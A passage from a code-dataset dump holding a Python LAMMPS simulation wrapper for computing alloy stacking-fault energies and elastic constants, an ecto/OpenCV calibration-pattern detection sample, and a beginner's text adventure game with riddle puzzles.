\".\"\n self.ready = False # Flag if class object has been correctly setup to run a lammps simulation\n self.error_msg = [] # Track error messages for this instance\n \n def print_error(self): print(\"No errors.\\n\") if self.error_msg == [] else print(\"\\n\".join([\"Errors:\"]+self.error_msg))\n\n def input_loc(self): return self.work_dir+\"/\"+self.input_file\n def data_loc(self): return self.work_dir+\"/\"+self.data_file\n def log_loc(self): return self.work_dir+\"/\"+self.log_file \n \n # Run function for lammps\n def run(self,total_attempts=3,echo_msg=False):\n if self.ready:\n # have a few goes at running lammps in case it has some unknown random failure\n run_attempts = 0\n while run_attempts <= total_attempts :\n # give a message saying which simulation is about to start\n if echo_msg : sp.call(['echo','Starting simulation for lammps file '+self.input_file]) \n # run lammps\n 
full_lammps_cmd = \" \".join([self.lammps_cmd,\"-log\",self.log_file,\"-in\",self.input_file,\"> /dev/null\"])\n run = sp.Popen(full_lammps_cmd, shell=True, executable='/bin/bash',cwd=self.work_dir,stdout=sp.PIPE,stderr=sp.PIPE)\n run.wait()\n stdout, stderr = run.communicate()\n # check lammps return code\n if run.returncode == 0 :\n # Assign an output to object\n break\n # returncode 1 means lammps failed in a controlled manner\n elif run.returncode == 1 :\n self.error_msg += [\"Lammps encountered a known error for input file \"+self.input_file]\n self.error_msg += [stdout.decode('ascii')]\n sp.call(['echo',\"\\n\".join(self.error_msg)]) \n break\n # other returncode means sim failed for some other reason\n else :\n self.error_msg += [\"Lammps encountered an unknown error for input file \"+self.input_file]\n run_attempts += 1\n else:\n self.error_msg += [\"Not ready to run lammps for this instance (probably no .in or .data file supplied).\"] \n \n # use this to setup lammps instance before running it\n @classmethod\n def setup(cls,input_file,data_file=None):\n if os.path.isfile(input_file) and (not data_file or os.path.isfile(data_file)):\n if not data_file:\n new_object = cls(input_file.split(\"/\")[-1],data_file)\n else:\n new_object = cls(input_file.split(\"/\")[-1],data_file.split(\"/\")[-1])\n new_object.work_dir = \".\"+\"/\".join(input_file.split(\"/\")[:-1])\n new_object.ready = True\n return new_object\n else :\n new_err_msg = \"Lammps .in file or .data file not found. Returning an empty class object.\\n\"\n new_object = cls()\n new_object.error_msg += [new_err_msg]\n return new_object\n \n @classmethod\n def default_setup(cls,script,loc=\".\",pot=\"NiAlCoCrMoTiWTa.set\"):\n script_lib = {\"sfe_setup\":\"/sfe_scripts/sfe_1.in\",\n \"sfe_min\":\"/sfe_scripts/sfe_2.in\",\n \"sfe_step\":\"/sfe_scripts/sfe_3_restart.in\",\n \"apbe_setup\":\"/sfe_scripts/apbe_1.in\",\n \"apbe_min\":\"/sfe_scripts/apbe_2.in\",\n \"apbe_step\":\"/sfe_scripts/apbe_3_restart.in\",\n \"md_setup\":\"/md_scripts/md_1.in\",\n \"md_run\":\"/md_scripts/md_2.in\",\n \"elastic_setup\":\"/elastic_scripts/elastic_1.in\",\n \"elastic_run\":\"/elastic_scripts/elastic_2.in\",\n \"elastic_deform\":\"/elastic_scripts/elastic_3.in\"}\n try:\n desired_file = sys.path[2]+\"/lammps_scripts\"+script_lib[script] if sys.path[2] != \"\" else \"lammps_scripts\"+script_lib[script]\n new_input_file = loc + \"/\" + script_lib[script].split(\"/\")[-1] if loc != \".\" else script_lib[script].split(\"/\")[-1]\n sp.call([\"mkdir\",\"-p\",loc])\n prefix = (loc.count(\"/\")+1*(loc!=\".\"))*\"../\" # Prefix for potentials location\n with open(desired_file,'r') as default_file:\n default_content = default_file.read()\n updated_content = default_content.replace(pot,sys.path[2]+\"/potentials/\"+pot) if sys.path[2] != \"\" else default_content.replace(pot,prefix+\"potentials/\"+pot)\n with open(new_input_file,\"w+\") as write_file:\n write_file.write(updated_content)\n new_object = cls.setup(new_input_file)\n new_object.work_dir = loc\n return new_object\n except KeyError: \n new_object = cls()\n new_object.error_msg += [\"Script name supplied does not exist\"]\n return new_object\n \n # can initialise using a currently existing instance\n @classmethod\n def based_on_setup(cls,old_instance,new_name,update_dict={},new_data_file=None,new_dir=False):\n # Check if old_instance is actually an instance of the class\n if isinstance(old_instance,Lammps):\n # Create new directory for this one\n old_work_dir = old_instance.work_dir\n new_work_dir = 
old_work_dir if not new_dir else old_work_dir+\"/\"+new_name\n sp.call([\"mkdir\",\"-p\",new_work_dir])\n # Check input file for references to \"old\" .data or potentials files\n # Also check for dict elements\n # This code is a bit messy to deal with possibility of 2+ word key\n new_lines = []\n with open(old_instance.input_loc(),'r') as old_file:\n lines = old_file.readlines()\n for line in lines:\n words = line.split()\n for j,_ in enumerate(words) :\n key = \" \".join(words[:j+1])\n # check for user specified update keywords\n if key in update_dict:\n words = [key]+update_dict[key].split()\n # check for potential files or .data files\n if key in (\"pair_coeff\",\"read_data\"):\n for i, word in enumerate(words):\n if os.path.isfile(new_work_dir+'/'+(new_work_dir.count('/')-old_work_dir.count('/'))*'../'+word):\n words[i] = (new_work_dir.count('/')-old_work_dir.count('/'))*'../'+word\n if key in update_dict or key in (\"pair_coeff\",\"read_data\"):\n break # Make sure a found keyword in the file isn't double counted whilst searching the whole line\n new_lines += [\" \".join(words)+\"\\n\"]\n # Write new input file\n new_input_file = new_work_dir+\"/\"+new_name\n with open(new_input_file,\"w+\") as new_file:\n new_file.writelines(new_lines)\n # Initialise new class instance\n if not new_data_file: \n new_mvd_data_file = old_instance.data_file\n else:\n new_mvd_data_file = new_data_file.split(\"/\")[-1]\n sp.call([\"cp\",new_data_file,new_work_dir+\"/\"+new_mvd_data_file])\n new_instance = cls(input_file=new_name,data_file=new_mvd_data_file)\n new_instance.work_dir = new_work_dir\n new_instance.ready = True\n return new_instance \n \n # use this to setup the command that will be used to run lammps\n # NB this will alter the command for ALL instances of the class that exist or will be created\n @classmethod\n def command(cls,cores,lammps_path = \"lmp_mpi\") :\n cls.lammps_cmd = \"mpirun -n \"+str(cores)+\" \"+lammps_path\n \n # Use this to update the .in file of a given object\n def update(self,update_dict,replace_dict={},new_input_name=None):\n # Check input file for references to \"old\" .data or potentials files\n # Also check for dict elements\n # This code is a bit messy to deal with possibility of 2+ word key\n new_lines = []\n with open(self.input_loc(),'r') as old_file:\n lines = old_file.readlines()\n for line in lines:\n # Check for simple replacements\n for replace_key in replace_dict:\n line = line.replace(replace_key,replace_dict[replace_key])\n # Check for updates to lammps keywords\n words = line.split()\n for j,_ in enumerate(words) :\n key = \" \".join(words[:j+1])\n # check for user specified update keywords\n if key in update_dict:\n words = [key]+update_dict[key].split()\n break # Make sure a found keyword in the file isn't double counted whilst searching the whole line\n new_lines += [\" \".join(words)+\"\\n\"]\n # Write new input file\n if new_input_name:\n self.input_file = new_input_name\n with open(self.input_loc(),\"w+\") as new_file:\n new_file.writelines(new_lines)\n \n def read_log(self,thermo_style,np_out=True,incl_step=True):\n # thermo_style is the list of strings which appear before the quantities to extract\n # specify np_out=False to get a non numpy array output\n with open(self.log_loc(),'r') as infile:\n f = infile.readlines()\n \n out_list = [[] for _ in thermo_style]\n if incl_step: out_list += [[]]\n for l in f:\n l = l.split()\n if incl_step:\n if 'Step' in l:\n out_list[0] += [float(l[l.index('Step')+1])]\n for i,word in enumerate(thermo_style):\n 
if incl_step: i += 1\n if word in l:\n out_list[i] += [float(l[l.index(word)+2])]\n \n if np_out : \n return np.array(out_list)\n else :\n return out_list\n \n # Some alloy specific functions:\n def alloyify(self,*args):\n # *args : dictionaries describing alloy composition\n dataf = self.data_loc()\n N_atoms = 0\n M_types = 0\n atoms_count = 0 # Flag which section of the file contains atomic positions\n atoms_start = 0 # Starting line of Atoms block within the data file.\n masses_flag = 1\n masses_start = 0 # Starting line pf masses block within \n counts = np.zeros(len(args)) # Want to count the number of atoms of each type\n in_types = [[] for _ in range(len(args))] # Find and store the intitial atom types for each atom\n f=[] # store readlines\n line_count = 0\n with open(dataf,'r') as data_in:\n # Analyse data as it is read in for number of atoms, types, etc\n while True:\n line = data_in.readline()\n if not line: break\n f += [line]\n line_count += 1\n line = line.rstrip().split()\n if not line : continue # skip blank lines\n if '#' in line[0] : continue # skip comments\n if line[-1] == \"atoms\": N_atoms += int(line[0])\n if line[-2:] == [\"atom\",\"types\"]: M_types += int(line[0]) # Not used - should check this matches len(*args)\n if line[0] == \"Atoms\": atoms_count += 1; continue # Flag start of atomic positions listings\n if atoms_count == 1: atoms_start += line_count-1\n if line[0] == \"Masses\": masses_flag = 1; continue\n if masses_flag == 1: masses_start += line_count-1; masses_flag = 0\n if atoms_count and atoms_count<=N_atoms:\n atom_type = int(line[1])\n counts[atom_type-1] += 1\n in_types[atom_type-1] += [int(line[0])]\n atoms_count += 1\n \n # Find all the atom types suplied\n elements = {}\n for _ in args: elements.update(_)\n elements = sorted(elements.keys())\n # Create list of atom types and assigned positions according to number of atoms of each type just found\n # ... 
and supplied *args (dictionaries for alloy compositions)\n final_dict = {}\n for N,inds,composition in zip(counts,in_types,args):\n for key in composition: composition[key] = int(round(N*composition[key]))\n composition[max(composition)] += int(N-sum(composition.values())) # make sure all atoms are accounted for\n # Track which atom indices have yet to be assigned an element.\n unassigned_inds = set(inds)\n for el in elements:\n type_num = elements.index(el)+1 # Actually assign types by number not element\n selection = set(sample(unassigned_inds,composition.get(el,0)))\n unassigned_inds -= selection\n for i in selection: final_dict[i] = type_num\n \n # Can now write out a new data file \n self.data_file = \"alloyified_\"+self.data_file\n with open(self.data_loc(),'w') as data_out:\n for line_count,line in enumerate(f):\n if \"atom types\" in line: \n line = line.split()\n line[0] = str(len(elements))\n line = \" \".join(line)+\"\\n\"\n if line_count >= atoms_start and line_count < (atoms_start + N_atoms):\n line = line.split()\n line[1] = str(final_dict[int(line[0])])\n line = \" \".join(line)+\"\\n\"\n if line_count == masses_start: \n line = \"\\n\".join([\" \".join([str(i+1),str(element(el).mass)]) for i,el in enumerate(elements)])+\"\\n\"\n if line_count > masses_start and line_count < (masses_start + M_types):\n continue # Don't write the original masses at all\n data_out.write(line)\n\n################################ EXAMPLES #####################################\n \ndef alloy_md_properties(composition,name,*args):\n overall_comp = {}\n for sub_comp in composition: overall_comp.update(sub_comp)\n alloy_elements = \" \".join(sorted(overall_comp.keys()))\n output_properties = {}\n cubic_sc = 10\n up = 0.002 # Fractional displacements used to calculate lattice params\n # sfe/apbe calculations (very similar)\n def sfe_apbe_protocol(var):\n sfe_dir = name+\"/\"+var\n sp.call([\"mkdir\",\"-p\",sfe_dir])\n sfe_setup = Lammps.default_setup(var+\"_setup\",loc=sfe_dir)\n sfe_setup.run() # This produces a datafile elemental.data\n sfe_min = Lammps.default_setup(var+\"_min\",loc=sfe_dir)\n sfe_min.data_file = \"elemental.data\"\n if var == \"sfe\": \n sfe_min.alloyify(composition[0].copy(),composition[-1].copy())\n elif var == \"apbe\":\n sfe_min.alloyify(composition[0].copy(),composition[-1].copy(),composition[0].copy(),composition[-1].copy())\n sfe_min.update(update_dict={\"read_data\":\"alloyified_elemental.data\"},replace_dict={\"Ni Ni\":alloy_elements,\"Ni Al Ni Al\":alloy_elements})\n sfe_min.run()\n # Find the maximum displacement that will return cell to original equilibrium\n with open(sfe_min.log_loc()) as read_file:\n f = read_file.readlines()\n x_tot = float(f[-17].split()[-2])\n a = x_tot*2/np.sqrt(6) # Lattice parameter\n # Step refers to shift in upper part of supercell to calculate intrinsic stacking fault\n sfe_step = Lammps.default_setup(var+\"_step\",loc=sfe_dir)\n sfe_step.update(update_dict={\"read_data\":\"alloyified_elemental.data\",\"variable latparam1 equal\":str(a)},replace_dict={\"Ni Ni\":alloy_elements,\"Ni Al Ni Al\":alloy_elements})\n sfe_step.run()\n with open(sfe_step.log_loc()) as read_file:\n f = read_file.readlines()\n E = float(f[-2].split()[-2])\n return E\n if \"sfe\" in args:\n output_properties[\"sfe\"] = sfe_apbe_protocol(\"sfe\")\n if \"apbe\" in args:\n output_properties[\"apbe\"] = sfe_apbe_protocol(\"apbe\")\n \n # md calculations for basic properties i.e. 
density/lattice parameters\n if \"density\" in args or \"lattice\" in args:\n md_dir = name+\"/md\"\n sp.call([\"mkdir\",\"-p\",md_dir])\n md_setup = Lammps.default_setup(\"md_setup\",loc=md_dir)\n md_setup.run()\n md_run = Lammps.default_setup(\"md_run\",loc=md_dir)\n md_run.data_file = \"elemental.data\"\n md_run.alloyify(composition[0].copy(),composition[-1].copy())\n md_run.update(update_dict={\"read_data\":\"alloyified_elemental.data\"},replace_dict={\"Ni Al\":alloy_elements})\n md_run.run()\n dump_values = md_run.read_log(['Density', 'Temp', 'Press', 'Cella', 'Cellb', 'Cellc'])\n density = np.mean(dump_values[1,2:])\n cell_length = np.mean(dump_values[4:,2:])\n lat_param = cell_length/cubic_sc\n output_properties[\"density\"] = density\n output_properties[\"lattice\"] = lat_param\n \n # Elastic constant calculations \n if \"C11\" in args or \"C12\" in args or \"C44\" in args:\n elastic_dir = name+\"/elastic\"\n sp.call([\"mkdir\",\"-p\",elastic_dir])\n elastic_setup = Lammps.default_setup(\"elastic_setup\",loc=elastic_dir)\n if \"density\" in args or \"lattice\" in args: \n elastic_setup.update(update_dict={\"variable latparam1 equal\":str(lat_param)})\n else: cell_length = 3.52*cubic_sc # default value\n elastic_setup.run()\n # Do NVT simulations for the undisplaced supercell\n elastic_equilib = Lammps.default_setup(\"elastic_run\",loc=elastic_dir)\n elastic_equilib.data_file = \"elemental.data\"\n elastic_equilib.alloyify(composition[0].copy(),composition[-1].copy())\n elastic_equilib.update(update_dict={\"read_data\":\"alloyified_elemental.data\"},replace_dict={\"Ni Al\":alloy_elements})\n #elastic_equilib.run()\n #dump_values = elastic_equilib.read_log(['Pxx','Pyy','Pzz','Pxy','Pxz','Pyz'])\n #Pij_mean = np.mean(dump_values[1:],axis=1)\n # Now do displaced cell calculations\n directions = []\n C11 = 0 ; C12 = 0 ; C44 = 0\n if \"C11\" in args or \"C12\" in args: directions += [\"x\",\"y\",\"z\"]\n if \"C44\" in args: directions += [\"xy\",\"xz\",\"yz\"]\n all_directions = [\"x\",\"y\",\"z\",\"xy\",\"xz\",\"yz\"]\n for direction in directions:\n for displacement in [-up,up]:\n actual_disp = str(displacement*cell_length)\n change_box_cmd = direction+\" delta 0 ${delta} remap units box\" if direction in [\"x\",\"y\",\"z\"] else direction+\" delta ${delta} remap units box\"\n current_run = Lammps.based_on_setup(elastic_equilib,direction+str(up)+\".in\",update_dict={\"variable delta equal\":actual_disp,\"change_box all\": change_box_cmd})\n current_run.run()\n dump_values = current_run.read_log(['Pxx','Pyy','Pzz','Pxy','Pxz','Pyz'])\n Pij = np.mean(dump_values[1:],axis=1)\n a = all_directions.index(direction) # Voigt index\n if a < 3: \n C11 -= Pij[a]/(6*displacement)\n C12 -= Pij[(a+1)%3]/(12*displacement) + Pij[(a+2)%3]/(12*displacement)\n if a >= 3:\n C44 -= Pij[a]/(6*displacement)\n if \"C11\" in args: output_properties[\"C11\"] = C11*1e-4\n if \"C12\" in args: output_properties[\"C12\"] = C12*1e-4\n if \"C44\" in args: output_properties[\"C44\"] = C44*1e-4\n \n return tuple(output_properties[key] for key in args)","sub_path":"python-lammps/simple_lammps_wrapper.py","file_name":"simple_lammps_wrapper.py","file_ext":"py","file_size_in_byte":20530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"310974646","text":"#!/usr/bin/env python\nimport ecto\nfrom ecto_opencv import highgui, calib, imgproc\n\nplasm = ecto.Plasm()\nsched = ecto.schedulers.Threadpool(plasm)\n\nvideo_cap = highgui.VideoCapture(video_device=0)\nfps = 
highgui.FPSDrawer()\nrgb2gray = imgproc.cvtColor('rgb -> gray', flag=7)\n\ndisplay_strand = ecto.Strand()\n\nchecker_detector = calib.PatternDetector('Checker Detector',\n rows=5, cols=4,\n pattern_type=\"chessboard\",\n square_size=0.03)\ncircle_detector = calib.PatternDetector('Dot Detector',\n rows=7, cols=3, pattern_type=\"acircles\",\n square_size=0.03)\ncircle_drawer = calib.PatternDrawer('Circle Draw',\n rows=7, cols=3)\nchecker_drawer = calib.PatternDrawer('Checker Draw',\n rows=5, cols=4)\ncircle_display = highgui.imshow('Pattern show',\n name='Pattern', waitKey= 2, maximize=True,\n strand=display_strand)\n\nplasm.connect(video_cap['image'] >> circle_drawer['input'],\n circle_drawer['out'] >> checker_drawer['input'],\n checker_drawer['out'] >> fps['image'],\n fps['image'] >> circle_display['input'],\n video_cap['image'] >> rgb2gray['input'],\n rgb2gray['out'] >> (circle_detector['input'], checker_detector['input']),\n circle_detector['out', 'found'] >> circle_drawer['points', 'found'],\n checker_detector['out', 'found'] >> checker_drawer['points', 'found'],\n )\n\necto.view_plasm(plasm)\nsched.execute()\n","sub_path":"samples/building_up_a_pose_estimator/example_05.py","file_name":"example_05.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"394752006","text":"from room import Room\nfrom player import Player\nfrom item import Item\nfrom item import Herb\nimport sys\nimport os\nimport cmd\nimport textwrap\nimport time\nimport random\n\n#### Map ####\n\"\"\"\n____________________________________________________________\n ===================\n | TREASURE |\n | |\n | [_-__-_] |\n | |\n |====== =======|\n +_+_+_+_+_+_+_+_+_+_+ { }\n | | | |\n | OVERLOOK | | |\n | | | |\n |_______ _________| ____{ }___\n __| |____ / \\\n | |_________| NARROW |\n | FOYER _________ |\n |___ ___| |______________/\n | |\n__________________| |_____________________________________\n\n OUTSIDE \n\n\"\"\"\n# zonemap = {\n# 'foyer': {\n# ZONENAME: '',\n# DESCRIPTION: 'description',\n# EXAMINATION: 'examine',\n# SOLVED: False,\n# UP: 'up', 'north',\n# DOWN: 'down', 'south',\n# LEFT: 'left', 'west',\n# RIGHT: 'right', 'east'\n# }\n# }\n# Declare all the rooms\n\nroom = {\n 'outside': Room(\"Outside Cave Entrance\",\n \"North of you, the cave mount beckons\",\n \"You see the sun set, and this beauty is bitter sweet. Unscramble this word ==> `lusunec`\",\n \"False\",\n 'foyer',\n \"False\",\n \"False\",\n \"False\",\n [Item(\"Red Stone\", \"Illuminates a red hue when held to light.\"), \n Item(\"Demon Skull\", \"It makes a faint humming sound.\"),\n Herb(\"Healing Leaf\", \"A minty tasting leaf\", 25, \"Herb\")\n ]\n ),\n\n 'foyer': Room(\"Foyer\",\n \"\"\"Dim light filters in from the south. Dusty\n passages run north and east.\"\"\",\n 'You hear the cries of tortured people.\\nThey eagerly would like to know what `avogadros number` is. (4 sig figs)',\n \"False\",\n 'overlook',\n 'outside',\n \"False\",\n 'narrow',\n []\n ),\n\n 'overlook': Room(\"Grand Overlook\",\n \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\",\n \"The door has locked behind you.\\nAnother tortured scientist appears and asks:\\nWhat is π/2 radians in degrees?\",\n \"False\",\n \"False\",\n 'foyer',\n \"False\",\n \"False\",\n []\n),\n\n 'narrow': Room(\"Narrow Passage\", \"\"\"The narrow passage bends here from west\nto north. 
The smell of gold permeates the air.\"\"\",\n \"Ancient writing teaches you the code combination `1337`\",\n \"False\",\n 'treasure',\n \"False\",\n 'foyer',\n \"False\",\n []\n),\n\n 'treasure': Room(\"Treasure Chamber\", \"\"\"You've found the long-lost treasure\nchamber. Leroy Jenkins stands before you,\\nand he looks hungry and ready to rap.\\nIf you answer his riddle, he will give you his WoW account information.\"\"\",\n \"Your palms are sweaty, knees weak, mom's spaghetti. The cake is a lie,\\nbecause Leroy Jenkins ate it with what kind of food?\",\n \"True\",\n \"False\",\n 'narrow',\n \"False\",\n \"False\",\n []\n),\n}\n\n\n# Link rooms together\n\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\n\nstarting_knight = [\n Item(\"Steel Sword\", \"Something To Slice With.\"), \n Item(\"Lions Mane\", \"Increases Health Slightly\")\n]\n\nstarting_magi = [\n Item(\"Magic Spell Book\", \"Provides Knowledge Of Ancient Spells\"), \n Item(\"Lions Mane\", \"Increases Health Slightly\")\n]\n\nstarting_assassin = [\n Item(\"Steel Dagger\", \"Something To Stab With.\"), \n Item(\"Lions Mane\", \"Increases Health Slightly\")\n]\n\n\n#\n# Main\n#\ndef main():\n os.system('clear')\n print(\"#########################################\\n\")\n print(\"# Welcome To Troy's Text Adventure Game #\\n\")\n print(\"#########################################\\n\")\n print(\"# 1.) Start # \")\n print(\"# 2.) Load # \")\n print(\"# 3.) Help # \")\n print(\"# 4.) Exit # \")\n print(\"#########################################\\n\")\n option = input(\"-> \")\n if option == \"1\":\n start()\n elif option == \"2\":\n pass\n elif option == \"3\":\n help_menu()\n elif option == \"4\":\n sys.exit()\n\n else:\n print(\"Requires 1, 2, 3, or 4 inputs\")\n main()\n\ndef help_menu():\n \n print(\"#########################################\\n\")\n print(\"# Welcome To Troy's Text Adventure Game #\\n\")\n print(\"#########################################\\n\")\n print(\"# type 1, 2, 3, 4 for menu navigation\\n \")\n print(\"# - Use `up`, `down`, `left`, `right` to move\\n \")\n print(\"# - Type The Following Commands For Actions:\\n['quit', 'q']\\n['move', 'go', 'travel', 'walk']\\n['examine', 'inspect', 'interact', 'look']\\n['inventory', 'items']\\n[drop, get]\\n[search, heal] \")\n print(\"# - Use 'examine' to examine something\\n \")\n print(\"# - Good Luck Adventurer. \")\n print(\"#########################################\\n\")\n main()\n\n\ndef class_define(player_name):\n print(\"Which Class Would You Like To Be {}: \".format(player_name))\n print(\"1.) Knight\")\n print(\"2.) Magi\")\n print(\"3.) 
Assassin\")\n \n\n player_class = input('Class: \\n').upper()\n if player_class == \"1\" or player_class == \"KNIGHT\":\n global starting_knight\n default_inventory = starting_knight\n class_name = \"Knight\"\n elif player_class == \"2\" or player_class == \"MAGI\":\n global starting_magi\n default_inventory = starting_magi\n class_name = \"Magi\"\n elif player_class == \"3\" or player_class == \"ASSASSIN\":\n global starting_assassin\n default_inventory = starting_assassin\n class_name = \"Assassin\"\n else:\n print(\"Requires 1, 2, or 3 inputs or specify as `knight`, `magi`, or `assassin`\\n\")\n class_define(player_name)\n \n default_location = room['outside']\n \n global PlayerIG\n PlayerIG = Player(player_name, default_location, default_inventory)\n start1(class_name)\n\ndef start():\n os.system('clear')\n print(\"Hello, what is your name?\")\n global room\n # print(room['outside'])\n options = input('-->')\n\n class_define(options)\n\n\n### Game Interactivity ###\ndef print_location():\n print('\\n' + ('#' * (4 + len(PlayerIG.current_room.name))))\n print('# ' + PlayerIG.current_room.name.upper() + ' #')\n print('# ' + PlayerIG.current_room.description + ' #')\n print('' + ('#' * (4 + len(PlayerIG.current_room.name))))\n\n\n#### Game Functionality ####\n\n\ndef player_move(myAction):\n ask = \"What direction would you like to {} to?\\n\".format(myAction)\n print(' ____________________________________________________________')\n print(' =================== ')\n print(' | TREASURE | ')\n print(' | | ')\n print(' | [_-__-_] | ')\n print(' | | ')\n print(' |====== =======| ')\n print(' +_+_+_+_+_+_+_+_+_+_+ { } ')\n print(' | | | | ')\n print(' | OVERLOOK | | | ')\n print(' | | | | ')\n print(' |_______ _________| ____{ }___ ')\n print(' __| |____ / | ')\n print(' | |_________| NARROW | ')\n print(' | FOYER _________ | ')\n print(' |___ ___| |______________/ ')\n print(' | | ')\n print('__________________| |_____________________________________ ')\n print(' ')\n print(' OUTSIDE ')\n\n dest = input(ask)\n if dest in ['up', 'north']:\n destination = room[PlayerIG.current_room.up]\n print(destination)\n movement_handler(destination)\n elif dest in ['down', 'south', 'd', 's']:\n destination = room[PlayerIG.current_room.down]\n movement_handler(destination)\n elif dest in ['left', 'west', 'l', 'w']:\n destination = room[PlayerIG.current_room.left]\n movement_handler(destination)\n elif dest in ['right', 'east', 'r', 'e']:\n destination = room[PlayerIG.current_room.right]\n movement_handler(destination)\n\ndef movement_handler(destination):\n print(\"\\n\" + \"You are in the \" + destination.name)\n try:\n PlayerIG.current_room = destination\n print_location()\n print(\"\\n\" + \"======================================\")\n print(\"What would you like to do?\")\n action = input(\"--->\" + \"\\n\")\n acceptable_actions = ['move', 'go', 'travel', 'walk', 'quit', 'q', 'examine', 'inspect', 'interact', 'look', 'inventory', 'items', 'drop', 'get', 'search', 'heal']\n while action.lower() not in acceptable_actions:\n print(\"Unknown Action, Try Again.\\n try 'move', 'go', 'travel', 'walk'\")\n action = input(\"-->\")\n if action.lower() in ['quit', 'q']:\n sys.exit()\n \n elif action.lower() in ['move', 'go', 'travel', 'walk']:\n if PlayerIG.current_room.solved == \"False\":\n print(\"\\n### Please `examine` Your Surroundings ###\")\n movement_handler(destination)\n else:\n player_move(action.lower())\n elif action.lower() in ['examine', 'inspect', 'interact', 'look']:\n 
player_examine(action.lower())\n        elif action.lower() in ['inventory', 'items']:\n            player_items(action.lower())\n        elif action.lower() in ['drop']:\n            player_drop()\n        elif action.lower() in ['get']:\n            player_get()\n        elif action.lower() in ['search']:\n            player_search()\n        elif action.lower() in ['heal']:\n            Herb.recover(PlayerIG)\n            movement_handler(destination)\n\n    except: \n        if action.lower() in ['move', 'go', 'travel', 'walk']:\n            print(\"You Can't Go That Way, follow the clues.\")\n            player_move(myAction='move')\n        else:\n            sys.exit()\n    \n\ndef start1(x):\n    os.system('clear')\n    # print_location()\n    print(\"Hello {} {},\\nyou have been chosen to infiltrate and retrieve \\nan `item` of great power.\".format(x ,PlayerIG.name))\n    print(\"\\n\" + \"======================================\")\n    destination = PlayerIG.current_room\n    movement_handler(destination)\n    # print(\"What would you like to do?\")\n    # action = input(\"--->\")\n    # acceptable_actions = ['move', 'go', 'travel', 'walk', 'quit', 'examine', 'inspect', 'interact', 'look']\n    # while action.lower() not in acceptable_actions:\n    #     print(\"Unknown Action, Try Again.\\n\")\n    #     action = input(\"-->\")\n    # if action.lower() == 'quit':\n    #     sys.exit()\n    # elif action.lower() in ['move', 'go', 'travel', 'walk']:\n    #     player_move(action.lower())\n    # elif action.lower() in ['examine', 'inspect', 'interact', 'look']:\n    #     player_examine(action.lower())\n\ndef player_search():\n    destination = PlayerIG.current_room\n    print(\"You search the room.\")\n    print(\"These items are spotted: \")\n    print(PlayerIG.current_room.items)\n    movement_handler(destination)\n\ndef player_get():\n    destination = PlayerIG.current_room\n    print(\"You search the room.\")\n    print(\"These items are spotted: \")\n    print(PlayerIG.current_room.items)\n    item = input('input item you would like to pick up -->')\n    room_items = PlayerIG.current_room.items\n    print(room_items[0].name)\n    print([i.name for i in room_items])\n    if any([i.name == item for i in room_items]):\n        match = next((l for l in room_items if l.name == item), None)\n        # print(match)\n        PlayerIG.inventory.append(match)\n        print(PlayerIG.inventory)\n        PlayerIG.current_room.items.remove(match)\n        # PlayerIG.currentRoom.items.remove(match)\n        movement_handler(destination)\n    else:\n        print(f\"There is no item with the name of {item}\")\n        movement_handler(destination)\n\ndef player_drop():\n    destination = PlayerIG.current_room\n    item = input('input item you would like to drop -->')\n    items = PlayerIG.inventory\n    if any([i.name == item for i in items]):\n        match = next((l for l in items if l.name == item), None)\n        print(match)\n        PlayerIG.inventory.remove(match)\n        PlayerIG.current_room.items.append(match)\n        print(\"Your Inventory: \", PlayerIG.inventory)\n        print(\"Items In Room: \", PlayerIG.current_room.items)\n        movement_handler(destination)\n    else: \n        print(f\"There is no item with the name of {item} in your inventory\")\n        movement_handler(destination)\n\ndef player_items(item):\n    destination = PlayerIG.current_room\n    print(\"These are your items...\\n\")\n    print(PlayerIG.inventory)\n    movement_handler(destination)\n\ndef player_examine(action):\n    destination = PlayerIG.current_room\n    print(PlayerIG.current_room.name)\n\n### Outside Cave Entrance EXAMINE PUZZLE ###\n\n    if PlayerIG.current_room.name == 'Outside Cave Entrance':\n        if PlayerIG.current_room.solved == True:\n            print(\"You have already exhausted this zone\")\n            movement_handler(destination)\n        else:\n            print('# ' + PlayerIG.current_room.examination + ' #')\n            word = input('->')\n            if word == 'nucleus':\n                PlayerIG.current_room.solved = True\n                print(PlayerIG.current_room.solved)\n                print(\"\\nGreat Job, the word is `nucleus`, You May Move North.\")\n\n                movement_handler(destination)\n            else:\n                print(\"Wrong, Try Again\")\n                print(action)\n                player_examine(action)\n\n### Foyer EXAMINE PUZZLE ###\n\n    if PlayerIG.current_room.name == 'Foyer':\n        if PlayerIG.current_room.solved == True:\n            print(\"You have already exhausted this zone\")\n            movement_handler(destination)\n        else:\n            print('# ' + PlayerIG.current_room.examination + ' #')\n            word = input('->')\n            if word == '6.022*10**23' or word == '6.022x10^23':\n                PlayerIG.current_room.solved = True\n                print(PlayerIG.current_room.solved)\n                print(\"\\nGreat Job, the tortured scientists rejoice, and laugh at you.\\nThey unlock various passageways.\")\n\n                movement_handler(destination)\n            else:\n                print(\"Wrong, Try Again\")\n                print(action)\n                player_examine(action)\n\n### Grand Overlook EXAMINE PUZZLE ###\n\n    if PlayerIG.current_room.name == 'Grand Overlook':\n        if PlayerIG.current_room.solved == True:\n            print(\"You have already exhausted this zone\")\n            movement_handler(destination)\n        else:\n            print('# ' + PlayerIG.current_room.examination + ' #')\n            word = input('->')\n            if word == '90' or word == '90 degrees':\n                PlayerIG.current_room.solved = True\n                print(PlayerIG.current_room.solved)\n                print(\"\\nGreat Job, the scientist realizes the meaning of his bald circular 2πr shaped head.\\nThe door has now unlocked behind you.\")\n\n                movement_handler(destination)\n            else:\n                print(\"Wrong, Try Again\")\n                print(action)\n                player_examine(action)\n\n### Narrow Passage EXAMINE PUZZLE ###\n\n    if PlayerIG.current_room.name == 'Narrow Passage':\n        if PlayerIG.current_room.solved == True:\n            print(\"You have already exhausted this zone\")\n            movement_handler(destination)\n        else:\n            print('# ' + PlayerIG.current_room.examination + ' #')\n            word = input('->')\n            if word == '1337':\n                PlayerIG.current_room.solved = True\n                